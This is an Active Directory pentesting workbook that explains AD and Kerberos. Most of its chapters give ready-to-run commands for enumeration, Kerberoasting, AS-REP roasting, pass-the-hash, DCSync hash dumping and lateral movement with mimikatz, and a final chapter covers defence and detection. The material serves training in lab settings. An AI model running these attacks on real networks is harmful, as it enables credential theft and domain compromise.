New to Active Directory? AD is the central authentication and authorisation system in 90%+ of corporate Windows networks. It's the crown jewel โ and the most common target in real-world attacks. This workbook is the starting point; practice on TryHackMe's AD labs.
Chapter 1 โ AD Fundamentals
# Active Directory = Microsoft's directory service for managing Windows networks
# Key components:
Domain Controller (DC) โ server running AD DS; manages authentication
Domain โ e.g. CORP.LOCAL โ logical boundary for AD
Forest โ collection of domains sharing schema
OU (Org Unit) โ container for organising objects (like folders)
GPO โ Group Policy Object โ settings pushed to all machines
# AD objects:
Users โ People + service accounts (svc_sql, svc_web)
Computers โ Domain-joined workstations and servers
Groups โ Collection of users/computers
โ Security groups: grant permissions
โ Distribution groups: email lists
# Privileged groups (pentest targets):
Domain Admins โ full control of domain
Enterprise Admins โ full control of forest
Schema Admins โ can modify AD schema
Administrators โ local admin on DC
Chapter 2 โ Kerberos Authentication
# Kerberos = ticket-based auth protocol (port 88)
# Understanding it is crucial to understanding AD attacks
1. Authentication Service (AS) Exchange:
User โ DC: "I'm Alice, here's my password hash (AS-REQ)"
DC โ User: "Here's your TGT" (Ticket Granting Ticket)
2. Ticket Granting Service (TGS) Exchange:
User โ DC: "I want to access the SQL server" (TGS-REQ with TGT)
DC โ User: "Here's a service ticket for SQL" (TGS-REP)
3. Application Request:
User โ SQL Server: "Here's my ticket" (AP-REQ)
SQL Server verifies ticket โ grants access
# Key attack points:
# TGT encrypted with KRBTGT hash โ Golden Ticket attack
# Service ticket encrypted with SERVICE ACCOUNT HASH โ Kerberoasting
# AS-REQ can be made without pre-auth โ ASREPRoasting
Chapter 3 โ AD Enumeration
# With a foothold (domain user credentials)
# Even a low-privilege user can enumerate almost everything in AD!
# PowerView (PowerShell) โ most powerful AD enum tool
Import-Module .\PowerView.ps1
Get-Domain # domain info
Get-DomainController # DC info
Get-DomainUser # all users
Get-DomainUser -SPN # service accounts (Kerberoasting targets)
Get-DomainGroup # all groups
Get-DomainGroup "Domain Admins" | Select-Object Member
Get-DomainComputer # all computers
Get-DomainGPO # Group Policy Objects
Find-LocalAdminAccess # where do you have local admin?
# From Linux with valid credentials:
# crackmapexec
crackmapexec smb 192.168.1.0/24 -u alice -p Password123
crackmapexec smb DC_IP -u alice -p Password123 --users
crackmapexec smb DC_IP -u alice -p Password123 --groups
# ldapsearch (query AD via LDAP)
ldapsearch -x -H ldap://DC_IP -D "alice@corp.local" -w Password123 \
-b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName
Chapter 4 โ BloodHound
# BloodHound maps AD relationships and finds attack paths to DA
# Step 1: Collect data with SharpHound (Windows)
.\SharpHound.exe --CollectionMethods All --Domain corp.local
# Outputs: 20240615_BloodHound.zip
# Or from Linux with BloodHound.py:
pip3 install bloodhound
bloodhound-python -u alice -p Password123 -d corp.local -ns DC_IP -c All
# Step 2: Start neo4j and BloodHound
sudo neo4j start
bloodhound &
# Upload the zip file โ Drag and drop into BloodHound
# Step 3: Useful queries in BloodHound:
Find All Domain Admins
Find Shortest Paths to Domain Admins
Find Principals with DCSync Rights
Find Computers where Domain Users are Local Admin
Find AS-REP Roastable Users
Find Kerberoastable Users
# BloodHound shows: Alice โ MemberOf โ IT_ADMINS โ AdminTo โ FILESERVER01
# Then: FILESERVER01 โ has session โ Domain Admin
# Attack path: compromise Alice โ pivot to FILESERVER01 โ steal DA creds
Chapter 5 โ Kerberoasting
# Service accounts have SPNs (Service Principal Names)
# Anyone can request a service ticket for any SPN
# Ticket is encrypted with SERVICE ACCOUNT'S NTLM hash
# Take ticket offline โ crack hash โ get plaintext password
# Impacket GetUserSPNs.py (from Linux)
GetUserSPNs.py corp.local/alice:Password123 -dc-ip DC_IP -request
# Outputs Kerberos hashes:
# $krb5tgs$23$*svc_sql$CORP.LOCAL$corp.local/svc_sql*$...
# PowerView (from Windows)
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat | Export-Csv spns.csv
# Crack with hashcat (mode 13100 = Kerberoasting)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt
# If cracked: svc_sql's password is "Summer2024!"
# Defence: use very long random service account passwords (25+ chars)
# Managed Service Accounts (MSA) rotate automatically โ use them!
Chapter 6 โ ASREPRoasting
# Users with "Do not require Kerberos pre-authentication" can be attacked
# No credentials needed โ just a username!
# From Linux with impacket:
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip DC_IP -no-pass
# Returns AS-REP hashes for vulnerable accounts
# If you have credentials already, find all vulnerable accounts:
GetNPUsers.py corp.local/alice:Password123 -dc-ip DC_IP -request
# Crack with hashcat (mode 18200 = AS-REP)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
# With PowerView:
Get-DomainUser -PreauthNotRequired
Chapter 7 โ Pass the Hash (PtH)
# You have an NTLM hash but don't know the plaintext password
# NTLM authentication works with the hash directly โ no cracking needed!
# Extract hashes from local SAM (requires local admin):
secretsdump.py -sam SAM -system SYSTEM LOCAL
# Or from a live system:
secretsdump.py administrator:Password123@192.168.1.10
# Output: Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# Format: Username:RID:LM_HASH:NT_HASH
# The NT hash (last part) is what you use for PtH
# PtH with crackmapexec:
crackmapexec smb 192.168.1.0/24 -u Administrator -H 8846f7eaee8fb117ad06bdd830b7586c
# [+] 192.168.1.50 Administrator (Pwn3d!) โ you have local admin!
# PtH with impacket psexec:
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c administrator@192.168.1.50
Chapter 8 โ DCSync Attack
# DCSync mimics a Domain Controller replication request
# Dump all password hashes from AD (including KRBTGT โ Golden Ticket)
# Requires: Domain Admin OR DCSync rights (Replication privileges)
# Dump all hashes from DC:
secretsdump.py -just-dc corp.local/administrator:Password123@DC_IP
# Get KRBTGT hash (for Golden Ticket):
secretsdump.py -just-dc-user krbtgt corp.local/administrator:Password123@DC_IP
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:KRBTGT_HASH:::
# With mimikatz (on Windows):
lsadump::dcsync /domain:corp.local /user:krbtgt
# KRBTGT hash โ create Golden Ticket โ unlimited DA access
# (valid until KRBTGT password changes twice)
Chapter 9 โ Lateral Movement
# Moving from one machine to another in the network
# WMI execution (Windows Management Instrumentation)
wmiexec.py corp.local/administrator:Password123@192.168.1.50
# or PtH:
wmiexec.py -hashes :NTHASH administrator@192.168.1.50
# SMB execution
psexec.py corp.local/administrator:Password123@192.168.1.50
smbexec.py corp.local/administrator:Password123@192.168.1.50
# RDP with stolen credentials
xfreerdp /u:administrator /p:Password123 /v:192.168.1.50
# Evil-WinRM (PowerShell remoting over WinRM port 5985)
evil-winrm -i 192.168.1.50 -u administrator -p Password123
evil-winrm -i 192.168.1.50 -u administrator -H NTHASH
# Once on machine โ check for more credentials:
mimikatz: sekurlsa::logonpasswords โ dump credentials from memory
sekurlsa::wdigest โ plaintext passwords (legacy)
lsadump::sam โ local SAM database
Chapter 10 โ AD Defence
# Defending Active Directory
Tiered Admin Model:
Tier 0: Domain Controllers + Domain Admins (most privileged)
Tier 1: Servers + Server Admins
Tier 2: Workstations + Helpdesk
Rule: Tier 0 admins NEVER log into Tier 1/2 machines
(prevents hash theft from compromised workstations)
# Technical controls:
โ Credential Guard : protects LSASS, prevents mimikatz
โ PAW : Privileged Access Workstations
โ LAPS : randomises local admin passwords per machine
โ Microsoft ATA/MDI : detects Kerberoasting, PtH, DCSync attempts
โ Audit Logging : log all privileged account usage
โ Disable NTLM : force Kerberos (harder to PtH)
โ Service accounts : use MSA/gMSA with 120-char auto-rotated passwords
โ Protected Users group: prevents caching of credentials
# Detection indicators (Blue Team):
Kerberoasting โ Event 4769 (TGS request) with RC4 encryption type
ASREPRoasting โ Event 4768 with Pre-auth type 0
DCSync โ Event 4662 (replication rights used from non-DC)
Pass-the-Hash โ Event 4624 logon type 3, NTLM, no logon hours
Workbook Complete! Active Directory attacks are the path to Domain Admin in 90% of real penetration tests. Practice on HackTheBox Pro Labs (Offshore, RastaLabs) or TryHackMe's AD rooms.